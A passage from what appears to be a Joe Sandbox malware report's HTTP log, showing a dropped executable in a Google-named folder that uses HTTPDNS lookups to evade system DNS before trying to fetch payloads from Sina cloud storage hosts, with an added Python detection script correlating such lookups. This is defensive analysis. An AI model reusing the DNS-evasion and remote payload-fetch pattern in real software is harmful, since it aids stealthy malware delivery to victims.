                                                                                83 | 192.168.2.5 | 50026 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:06.062565088 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                Dec 5, 2024 14:27:07.649446011 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                84 | 192.168.2.5 | 50027 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:06.062864065 CET | 81 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                Dec 5, 2024 14:27:07.295473099 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                85 | 192.168.2.5 | 50028 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:06.063364983 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                86 | 192.168.2.5 | 50030 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:07.423237085 CET | 238 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                Dec 5, 2024 14:27:08.964220047 CET | 528 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:08 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 765b542c-2412-0521-2708-5ca7213e0802
                                                                                x-error-code: NoSuchBucket
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>765b542c-2412-0521-2708-5ca7213e0802</RequestId></Error>0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                87 | 192.168.2.5 | 50035 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Dec 5, 2024 14:27:09.095890999 CET | 236 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:10.935267925 CET | 504 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:01 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 769b7fff-2412-0521-2710-5ca7213e02f2
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 36 39 62 37 66 66 66 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 30 2d 35 63 61 37 32 31 33 65 30 32 66 32 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>769b7fff-2412-0521-2710-5ca7213e02f2</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 88 | 192.168.2.5 | 50040 | 27.221.16.179 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:11.155288935 CET | 236 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:12.934119940 CET | 504 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:10 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32ee3085-2412-0521-2712-b4055d752c2c
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 65 65 33 30 38 35 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 32 2d 62 34 30 35 35 64 37 35 32 63 32 63 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32ee3085-2412-0521-2712-b4055d752c2c</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 89 | 192.168.2.5 | 50047 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:13.064100981 CET | 79 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                 Dec 5, 2024 14:27:14.318424940 CET | 131 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 37 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 34 39
                                                                                Data Ascii: 27.221.16.179;27.221.16.149


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 90 | 192.168.2.5 | 50046 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:13.064102888 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                 Dec 5, 2024 14:27:14.664510012 CET | 131 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 27
                                                                                Data Raw: 32 37 2e 32 32 31 2e 31 36 2e 31 34 39 3b 32 37 2e 32 32 31 2e 31 36 2e 31 37 39
                                                                                Data Ascii: 27.221.16.149;27.221.16.179


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 91 | 192.168.2.5 | 50048 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:13.071764946 CET | 82 | OUT | GET /d?dn=sinacloud.net HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 92 | 192.168.2.5 | 50052 | 27.221.16.179 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:14.443644047 CET | 236 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:16.259028912 CET | 504 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:13 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 3566e00a-2412-0521-2715-6c92bfce68e1
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 35 36 36 65 30 30 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 35 2d 36 63 39 32 62 66 63 65 36 38 65 31 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>3566e00a-2412-0521-2715-6c92bfce68e1</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 93 | 192.168.2.5 | 50056 | 27.221.16.149 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:16.386384010 CET | 236 | OUT | GET /question/c6tmassa HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinacloud.net
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:18.197642088 CET | 504 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx
                                                                                Date: Thu, 05 Dec 2024 13:27:09 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 32da3749-2412-0521-2717-b4055d752cc6
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 63 36 74 6d 61 73 73 61 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 32 64 61 33 37 34 39 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 37 2d 62 34 30 35 35 64 37 35 32 63 63 36 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: da<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/c6tmassa</Resource> <RequestId>32da3749-2412-0521-2717-b4055d752cc6</RequestId></Error>0

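Sessions 89 to 93 show how the dropped binary finds its download hosts. Instead of a system DNS query, it sends `GET /d?dn=sinacloud.net` with the bare `A2F0jleks` User-Agent to 119.29.29.29 and 182.254.116.116 (the `/d?dn=<name>` form is the query interface of DNSPod's HTTPDNS service; the same request to 114.114.114.114 drew no answer in this capture), receives a `;`-separated list of IPv4 literals in the response body, and then connects to those addresses directly with `Host: sinacloud.net` (sessions 92 and 93). Because the name is never resolved through the resolver the host is configured with, DNS-based logging and blocking never see it; what is visible is the HTTP exchange itself. The script below is an added example, constructed from these sessions and not part of the Joe Sandbox report: it parses each request, recognises HTTPDNS lookups, parses their answers, and correlates every answer with the later connections whose destination IP came from it and whose Host header is the resolved name. The session tuples, field layout and function names are constructed for the example, not the sandbox's own export format.

```python
"""Correlate HTTPDNS lookups with the direct-to-IP connections that follow.

Added example. SESSIONS is constructed to mirror sessions 89-93 of the
Joe Sandbox HTTP log for this sample; it is not the report's own data format.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Constructed sample: (session id, destination ip, raw request, response body or None)
SESSIONS = [
    (89, "119.29.29.29",
     "GET /d?dn=sinacloud.net HTTP/1.1\r\nUser-Agent: A2F0jleks\r\nHost: 119.29.29.29\r\n\r\n",
     "27.221.16.179;27.221.16.149"),
    (90, "182.254.116.116",
     "GET /d?dn=sinacloud.net HTTP/1.1\r\nUser-Agent: A2F0jleks\r\nHost: 182.254.116.116\r\n\r\n",
     "27.221.16.149;27.221.16.179"),
    (91, "114.114.114.114",
     "GET /d?dn=sinacloud.net HTTP/1.1\r\nUser-Agent: A2F0jleks\r\nHost: 114.114.114.114\r\n\r\n",
     None),  # no reply was seen on this session
    (92, "27.221.16.179",
     "GET /question/c6tmassa HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; "
     "Trident/7.0; rv:11.0) like Gecko\r\nHost: sinacloud.net\r\nRange: bytes=0-\r\n\r\n",
     "<Error><Code>NoSuchBucket</Code></Error>"),
    (93, "27.221.16.149",
     "GET /question/c6tmassa HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; "
     "Trident/7.0; rv:11.0) like Gecko\r\nHost: sinacloud.net\r\nRange: bytes=0-\r\n\r\n",
     "<Error><Code>NoSuchBucket</Code></Error>"),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers); header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def is_ip_literal(host):
    """True if the Host header is a bare IP address (optionally with :port)."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0])
        return True
    except ValueError:
        return False


def httpdns_query_name(target, headers):
    """Return the queried name if the request is a DNSPod-style HTTPDNS lookup:
    GET /d?dn=<name> sent to an IP-literal Host. Otherwise return None."""
    parts = urlsplit(target)
    if parts.path != "/d":
        return None
    dn = parse_qs(parts.query).get("dn")
    if not dn or not is_ip_literal(headers.get("host", "")):
        return None
    return dn[0].lower()


def parse_httpdns_answer(body):
    """HTTPDNS answers here are ';'-separated IPv4 literals; anything else is dropped."""
    answers = []
    for token in (body or "").split(";"):
        try:
            answers.append(str(ipaddress.IPv4Address(token.strip())))
        except ValueError:
            continue
    return answers


def correlate(sessions):
    """Pass 1 collects HTTPDNS answers per name. Pass 2 flags every session whose
    destination IP came from such an answer and whose Host header is the resolved
    name: a connection that bypassed the host's configured DNS resolver."""
    resolved = {}  # name -> set of answered IPs
    findings = []
    for sid, dst, raw_req, body in sessions:
        _method, target, hdrs = parse_request(raw_req)
        name = httpdns_query_name(target, hdrs)
        if name is not None:
            resolved.setdefault(name, set()).update(parse_httpdns_answer(body))
            findings.append((sid, "httpdns_query", name, dst, hdrs.get("user-agent", "")))
    for sid, dst, raw_req, _body in sessions:
        _method, target, hdrs = parse_request(raw_req)
        host = hdrs.get("host", "").lower()
        if host in resolved and dst in resolved[host]:
            findings.append((sid, "httpdns_resolved_connection", host, dst, target))
    return findings


if __name__ == "__main__":
    for finding in correlate(SESSIONS):
        print(finding)
```

The same two passes work over a proxy log or a Zeek `http.log` export: the only fields needed are destination IP, request target, Host header and, for the `/d` requests, the response body. Matching on the resolver IPs or the `A2F0jleks` User-Agent alone would miss a build that switched HTTPDNS provider or agent string; the correlation of answered IPs with the Host-bearing connections that follow is the part that generalises.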

                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 94 | 192.168.2.5 | 50061 | 123.126.45.208 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:18.322895050 CET | 243 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:19.897171021 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:19 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 34f12e6c-2412-0521-2719-6c92bfce66de
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 33 34 66 31 32 65 36 63 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 31 39 2d 36 63 39 32 62 66 63 65 36 36 64 65 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>34f12e6c-2412-0521-2719-6c92bfce66de</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 95 | 192.168.2.5 | 50067 | 114.114.114.114 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:20.026598930 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 114.114.114.114


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 96 | 192.168.2.5 | 50068 | 182.254.116.116 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:20.027196884 CET | 84 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 182.254.116.116
                                                                                 Dec 5, 2024 14:27:21.593816042 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 97 | 192.168.2.5 | 50069 | 119.29.29.29 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:20.029937983 CET | 81 | OUT | GET /d?dn=sinastorage.com HTTP/1.1
                                                                                User-Agent: A2F0jleks
                                                                                Host: 119.29.29.29
                                                                                 Dec 5, 2024 14:27:21.254275084 CET | 117 | IN | HTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Server: Http Server
                                                                                Content-Type: text/html
                                                                                Content-Length: 13
                                                                                Data Raw: 31 38 33 2e 36 30 2e 39 35 2e 32 32 31
                                                                                Data Ascii: 183.60.95.221


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 98 | 192.168.2.5 | 50073 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:21.416002035 CET | 243 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.com
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:22.952295065 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:22 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 7470899e-2412-0521-2722-047bcb4b71b0
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 37 30 38 39 39 65 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 32 2d 30 34 37 62 63 62 34 62 37 31 62 30 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>7470899e-2412-0521-2722-047bcb4b71b0</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 99 | 192.168.2.5 | 50078 | 183.60.95.221 | 80 | 5448 | C:\Program Files (x86)\Google\D74384FB8D2C9.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 5, 2024 14:27:23.078197002 CET | 242 | OUT | GET /question/l6tbasser.zip HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                Accept-Language: zh-CN
                                                                                Accept-Encoding: gzip, deflate
                                                                                Host: sinastorage.cn
                                                                                Range: bytes=0-
                                                                                Connection: Keep-Alive
                                                                                 Dec 5, 2024 14:27:24.623226881 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.6.0 r22061420-1acaf9b
                                                                                Date: Thu, 05 Dec 2024 13:27:24 GMT
                                                                                Content-Type: application/xml
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Requester: GRPS000000ANONYMOUSE
                                                                                X-RequestId: 74171eea-2412-0521-2724-0894eff93518
                                                                                x-error-code: NoSuchBucket
                                                                                Data Raw: 64 66 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 42 75 63 6b 65 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 71 75 65 73 74 69 6f 6e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 73 6f 75 72 63 65 3e 2f 71 75 65 73 74 69 6f 6e 2f 6c 36 74 62 61 73 73 65 72 2e 7a 69 70 3c 2f 52 65 73 6f 75 72 63 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 37 34 31 37 31 65 65 61 2d 32 34 31 32 2d 30 35 32 31 2d 32 37 32 34 2d 30 38 39 34 65 66 66 39 33 35 31 38 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: df<?xml version="1.0" encoding="UTF-8"?><Error> <Code>NoSuchBucket</Code> <Message>question</Message> <Resource>/question/l6tbasser.zip</Resource> <RequestId>74171eea-2412-0521-2724-0894eff93518</RequestId></Error>0


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
